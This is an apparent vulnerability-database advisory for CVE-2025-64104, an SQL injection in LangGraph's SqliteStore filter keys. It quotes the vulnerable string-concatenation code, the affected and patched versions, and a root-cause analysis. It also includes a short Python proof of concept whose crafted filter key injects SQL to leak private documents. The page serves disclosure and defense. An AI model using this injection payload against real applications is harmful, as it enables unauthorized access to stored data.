7.3

CVSS Score

3.1

-

CVSS Score

Basic Information

Concerned about an active attack path?

Talk to our security experts and see Miggo in action.

Miggo Vulnerability Database

→

CVE-2025-64104

CVE-2025-64104: LangGraph SQLite Checkpoint Filter Key SQL Injection POC for SqliteStore

Summary

LangGraph's SQLite store implementation contains SQL injection vulnerabilities using direct string concatenation without proper parameterization, allowing attackers to inject arbitrary SQL and bypass access controls.

Details

/langgraph/libs/checkpoint-sqlite/langgraph/store/sqlite/base.py

The key portion of the JSON path is concatenated directly into the SQL string without sanitation. There's a few different occurrences within the file.

  filter_conditions.append(
      "json_extract(value, '$."
      + key  # <-- Directly concatenated, no escaping!
      + "') = '"
      + value.replace("'", "''")  # <-- Only value is escaped
      + "'"
  )

Who is affected

This issue affects only developers or projects that directly use the checkpoint-sqlite store.

An application is vulnerable only if it:

Instantiates the SqliteStore from the checkpoint-sqlite package, and
Builds the filter argument using keys derived from untrusted or user-supplied input (such as query parameters, request bodies, or other external data).

If filter keys are static or validated/allowlisted before being passed to the store, the risk does not apply.

Note: users of LangSmith deployments (previously known as LangGraph Platform) are not affected as those deployments rely on a different checkpointer implementation.

PoC

Complete instructions, including specific configuration details, to reproduce the vulnerability.

#!/usr/bin/env python3
"""Minimal SQLite Key Injection POC for LangGraph"""

from langgraph.store.sqlite import SqliteStore

# Create store with test data
with SqliteStore.from_conn_string(":memory:") as store:
    store.setup()
    
    # Add public and private documents
    store.put(("docs",), "public", {"access": "public", "data": "public info"})
    store.put(("docs",), "private", {"access": "private", "data": "secret", "password": "123"})
    
    # Normal query - returns 1 public document
    normal = store.search(("docs",), filter={"access": "public"})
    print(f"Normal query: {len(normal)} docs")
    
    # SQL injection via malicious key
    malicious_key = "access') = 'public' OR '1'='1' OR json_extract(value, '$."
    injected = store.search(("docs",), filter={malicious_key: "dummy"})
    
    print(f"Injected query: {len(injected)} docs")
    for doc in injected:
        if doc.value.get("access") == "private":
            print(f"LEAKED: {doc.value}")

(GitHub Advisory)

Miggo Vulnerability Database

→

CVE-2025-64104

CVE-2025-64104:

7.3

CVSS Score

3.1

-

CVSS Score

Basic Information

Technical Details

Package Name	Ecosystem	Vulnerable Versions	First Patched Version
langgraph-checkpoint-sqlite	pip	<= 2.0.10	2.0.11

Technical Details

Vulnerability Intelligence
Miggo AI

Root Cause Analysis

The vulnerability is a SQL injection within the SqliteStore component of the langgraph-checkpoint-sqlite package. The root cause is the improper handling of user-supplied keys in the filter argument of the search method. These keys are directly concatenated into a SQL query string without sanitization, allowing an attacker to inject arbitrary SQL.

The analysis of the provided patch bc9d45b476101e441cb1cc602dea03eb29232de4 confirms this. The patch introduces a new function, _validate_filter_key, which validates that filter keys contain only safe characters. This validation function is then called in the _prepare_batch_search_queries and _get_filter_condition methods before the keys are used, proving that these were the points where the injection occurred.

The SqliteStore.search method is the public entry point for the vulnerability, as shown in the Proof of Concept. During an exploit, a runtime profiler would show a call to SqliteStore.search, which then calls the internal methods _prepare_batch_search_queries and _get_filter_condition where the malicious SQL is constructed. Therefore, all three functions are key indicators of this vulnerability being triggered.

Vulnerable functions

SqliteStore.search

libs/checkpoint-sqlite/langgraph/store/sqlite/base.py

This is the public-facing method that accepts a `filter` dictionary. When the keys of this dictionary are from untrusted user input, it leads to a SQL injection vulnerability because the keys are not sanitized before being used to construct a SQL query. It is the primary entry point for the vulnerability.

SqliteStore._prepare_batch_search_queries

libs/checkpoint-sqlite/langgraph/store/sqlite/base.py

This internal method is responsible for preparing search queries. It iterates over the items in the `filter` dictionary and, before the patch, used the `key` directly in SQL string concatenation without sanitization. The patch added a call to `_validate_filter_key` to prevent the injection.

SqliteStore._get_filter_condition

libs/checkpoint-sqlite/langgraph/store/sqlite/base.py

This helper function generates filter conditions for the SQL query. It was vulnerable because it used the `key` from the filter without sanitization. The patch added a call to `_validate_filter_key` to fix this vulnerability, confirming it was a vulnerable location.

WAF Protection Rules

WAF Rule

W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.

Reasoning

*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.

7.3

-

Basic Information

Basic Information

Concerned about an active attack path?

CVE-2025-64104: LangGraph SQLite Checkpoint Filter Key SQL Injection POC for SqliteStore

Summary

Details

Who is affected

PoC

CVE-2025-64104:

7.3

-

Basic Information

Basic Information

Technical Details

Technical Details

Vulnerability IntelligenceMiggo AI

Root Cause Analysis

Vulnerable functions

WAF Protection Rules

WAF Rule

Reasoning

Vulnerability IntelligenceMiggo AI

Vulnerability IntelligenceMiggo AI

Root Cause Analysis

Vulnerable functions

WAF Protection Rules

WAF Rule

Reasoning

Technical Details

CVE-2025-64104: LangGraph SQLite Checkpoint Filter Key SQL Injection POC for SqliteStore

Summary

Details

Who is affected

PoC

7.3

7.3

Basic Information

Basic Information

Vulnerability Intelligence
Miggo AI

Vulnerability Intelligence
Miggo AI

Vulnerability Intelligence
Miggo AI